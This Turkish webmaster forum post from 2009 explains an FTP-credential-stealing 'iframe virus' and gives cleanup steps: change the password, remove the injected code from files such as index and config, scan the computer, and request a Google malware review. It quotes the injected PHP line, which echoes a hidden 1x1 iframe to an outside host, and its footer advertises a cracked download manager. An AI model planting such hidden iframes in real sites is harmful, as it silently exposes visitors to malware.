[Kayıt ol]   [Şifremi unuttum!
Kullanıcı adım:   Parolam:  

Yazar Mesaj   #15505  28-08-2009 11:34 GMT+2 saat  

Can

Admin

Tecrübe Puanı.: 100%
Ruh Hali: Neutral
Mesaj 5381
Ülke:
Meslek: Webmaster
Facebook'ta Paylaş
Ftp Virüsü İframe Hakkında Herşey! Kurtulmanın Yolları!

Nedir bu iframe ftp virüsü?

Ftp virüsünun bulaştığı sitelerden size de bulaşır ve ftp girişi yaptığınızda veya cuteftp firezilla gibi programlarına şifrelerinizi kaydettiğinizde virüs ftpdeki bazı dosyalara bulaşır ve ziyaretçilerinize de bulaşmaya başlar. Sanmayın Ki Firezilla gibi ücretsiz bir programla virüs bulaşmıyor! Firezilla kullandığım halde virüs çok kez bana da musallat oldu.

İlk olarak Ftp Şifrenizi Değiştirmeyi Unutmayın! Şifrenizi Panelinizden Değiştirtirin Ki Siz silerken bir yandan da virüs tekrar ftp'nize sızmaya devam etmesin!...

FTP Yedeğiniz varsa yedeğinizi atın virüs taramanızı yapın ve bu durumdan ilk adımda kurtulun...

Eğer yedeğiniz yoksa:

Ftp dosyalarınızı taramaya başlayın...

Ftp Dosyalarınıza Aşağıdakine benzer bir şekilde kod ekler

Kod:
echo "<iframe src=\"http://hosttracker.net/?click=2930359\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Genellikle bu virüs aşağıdaki dosyaları tercih eder. Bu Dosyaları kontrol edin ve silin...

* index
* footer
* header
* admin
* connect
* config
* login
* logout
* contact
* showthread

İlgili iframe kodlarını sildikten sonra, şifrenizi de değiştirdiğiniz için virüs tekrar giriş yapamayacaktır. Fakat virüs halen bilgisayarınızda barınmaktadır...

Virüsü Silmek için Eset Nod32, Spyware Doctor, MalwareBytes ve Ad-Aware Gibi Programlarla Sisteminizi Taratın, göreceksiniz ki birçok trojan vb uygulamalar bulanacaktır. Sisteminizi temizledikten sonra tekrar ftpnize bağlanabilirsiniz.. Peki Google Sizi Karalisteye almışsa...

Google sizi kara listeye almışsa ve Artık Virüsün Silindiğine Eminseniz Aşağıdaki adımları takip edin!

1. Adım: www.google.com/webmasters/tools/ Adresine girin …

2. Adım: Gmail hesabınız ile giriş yapın …

3. Adım: Sitenizi ekleyerek doğrulayın …

4. Adım: Doğruladıktan sonra, kötü amaçlı yazılım uyarısına tıklayarak, zararlı yazılımın olduğu sayfaları görün …

6. Adım: Sol menüden “Siteyi tekrar değerlendirme” seçeneğine tıklayın …

7. Adım: Sitenizde bulunan kötü yazılımı kaldırdığınızı ve tekrar değerlendirmelerini rica edin …

8. Adım: Siteniz en fazla 2 gün içinde düzelecektir ve Saldırgan site olmaktan çıkarılacaktır!

SON OLARAK... NETTEN TEKRAR BULAŞMAMASI İÇİN KESİNLİKLE FİREFOX PROGRAMININ SON SÜRÜMÜNÜ KULLANIN. GERÇEKTEN EN GÜVENLİSİ FİREFOX!

FORUMUMUZ VE LİNKLERİMİZ HERKESE AÇIK! BİZE DESTEK VERENLERE TEŞEKKÜRLER!
HER TÜRLÜ KONUDA İLETİŞİME GEÇEBİLİRSİNİZ!
FACEBOOK http://www.facebook.com/huseyincancalisan

LimeWire Çalışan Sorunsuz Sürüm Burada!
İnternet Download Manager 5.19 Full Crack % 100 Çalışıyor Denendi
TIKLA İNDİR!!
Kullanıcın Sayfasını Ziyaret Et Gender_Bay Çevirimiçi durumu